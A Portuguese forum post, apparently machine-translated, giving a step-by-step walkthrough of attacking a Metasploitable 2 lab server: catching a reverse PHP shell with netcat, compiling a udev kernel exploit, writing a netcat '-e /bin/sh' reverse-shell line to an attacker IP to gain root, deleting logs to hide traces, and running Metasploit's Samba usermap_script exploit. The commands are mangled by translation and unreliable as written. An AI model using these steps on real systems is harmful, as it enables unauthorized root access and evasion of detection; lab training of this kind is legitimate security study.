seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Você não está conectado. Conecte-se ou registre-se

 » Pentest » Exploits / Shellcode / Fixed » Escalation privilégio + Samba

Escalation privilégio + Samba

Ver o tópico anterior Ver o tópico seguinte Ir em baixo  Mensagem [Página 1 de 1]

1 Escalation privilégio + Samba em Dom Dez 09, 2012 2:37 pm

0x06

avatar
postador
postador
Neste post vamos explorar vulnerabilidades. Se você se lembrar, na última entrada apenas pela obtenção de um reverso php shell e netcat. No post de hoje, vamos partir do shell, por usar um exploit em C para executar um elevador e obter privilégios de root.
Em seguida, use um outro exploit (via Metasploit) para explorar Samba (que como vimos no primeiro turno está sendo executado nas portas 139 e 445).

Escalação de privilégios

l. Ou siga estes passos:

Executar um netcat na porta 1234 com:

1 nc-vnlp 1234
E depois de visitar o url onde o shell reverso estava subindo no meu caso foi [Você precisa estar registrado e conectado para ver este link.]

Teremos acesso ao reservatório, como pode ser visto nesta figura:
[Você precisa estar registrado e conectado para ver esta imagem.]
Agora o que podemos fazer com o comando whoami e comando id que é o ID do usuário, e seu grupo:
1 $ whoami
2 www-data
$ 3 ID
4 uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)

Também usando o olhar uname uname-r-ay em dados com o kernel que executa o servidor:
&& $ 1 uname-a uname-r
Metasploitable 2 Linux 2.6.24-16-server # 1 SMP qui 10 abr 13:58:00 UTC 2008 i686 GNU / Linux
2.6.24 3-16-servidor

Agora podemos ir para explorar db e busca de exploits para essa versão do kernel.

No nosso caso, usamos esta façanha não faria sentido fazer um wget através do escudo que temos e baixá-lo no site. Mas não temos privilégios de gravação para que o usuário (www-data). Então, se tomarmos um pouco de imaginação mais e lembrando que em php shell subimos no exemplo acima está em [Você precisa estar registrado e conectado para ver este link.] Se acessar o caminho / var / www / tikiwiki / backups / prs.php encontrar o arquivo, para subir a façanha da mesma forma que fomos até o shell em php para acessar uma url [Você precisa estar registrado e conectado para ver este link.] / tiki-backup.php.
[Você precisa estar registrado e conectado para ver esta imagem.]
Se não estão em / var / www / tikiwiki / backups / passamos para esse diretório e compilar o exploit aqui vamos nós com gcc:
1 lpexploit.c exploit gcc-o

Agora, vamos fazer uma conexão a partir da casca, temos de recuar (o ip 192.168.0.6 é nosso Backtrack), para quando executar o exploit. Vamos fazer:
1 echo '# / bin / sh'> / tmp / executar
2 echo '/ bin / netcat-e / bin / sh 192.168.0.6 1234' >> / tmp / run

Uma vez feito isso, temos que verificar se pid udev é porque precisamos explorar nosso passe um argumento, que é o pid do udev - 1:
1 $ ps-edf | grep udev
2 root 3018 1 0 10:59? 00:00:00 / sbin / udevd - daemon
3 www-data 5483 5469 0 11:03? 00:00:00 grep udev

Agora, só podemos executar outro netcat, que é onde temos o shell de root:
1 nc-vlp 1234

E a partir da casca nós executar / Exploit 3017 (3017 é o pid do udev -1).:
[Você precisa estar registrado e conectado para ver esta imagem.]
Nota:. Se você quer apagar nossas faixas (pelo menos superficialmente), não podemos esquecer de agradecer lpexploit.cy excluir comando find-name \ * Log-mmin x pode visualizar arquivos modificados nos últimos x minutos para apagar nossas pegadas (correr em / var / logs /).
Samba explorando com Metasploit

Metasploit Começamos com a msfconsole comando como de costume e nós vamos fazer uma pesquisa com o "samba", para ver se há exploits disponíveis:
1 msf> Pesquisa samba

Nós usaremos explorar / multi / samba / usermap_script, ou carga, como de costume, com o uso, e olhar para as opções oferecidas pelo exploit.
1 msf> uso exploit / multi / samba / usermap_script
2 exploit msf (usermap_script) Opções> show
[Você precisa estar registrado e conectado para ver esta imagem.]
Com o rhost [ip] passamos a explorar o IP remoto, e rport a porta, no nosso caso 445 como dito acima:
Um exploit msf (usermap_script)> set rhost 192.168.0.2
2 exploit msf (usermap_script)> set rport 445

Agora, com cargas show vai escolher uma carga útil de nosso gosto, no meu caso cmd / unix / reverso
ver fonte
imprimir?
Um exploit msf (usermap_script)> show payloads
[Você precisa estar registrado e conectado para ver esta imagem.]
Payload

Agora só podemos executar o exploit para explorar e nós temos um outro shell:
[Você precisa estar registrado e conectado para ver esta imagem.]

Happy training Wink

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum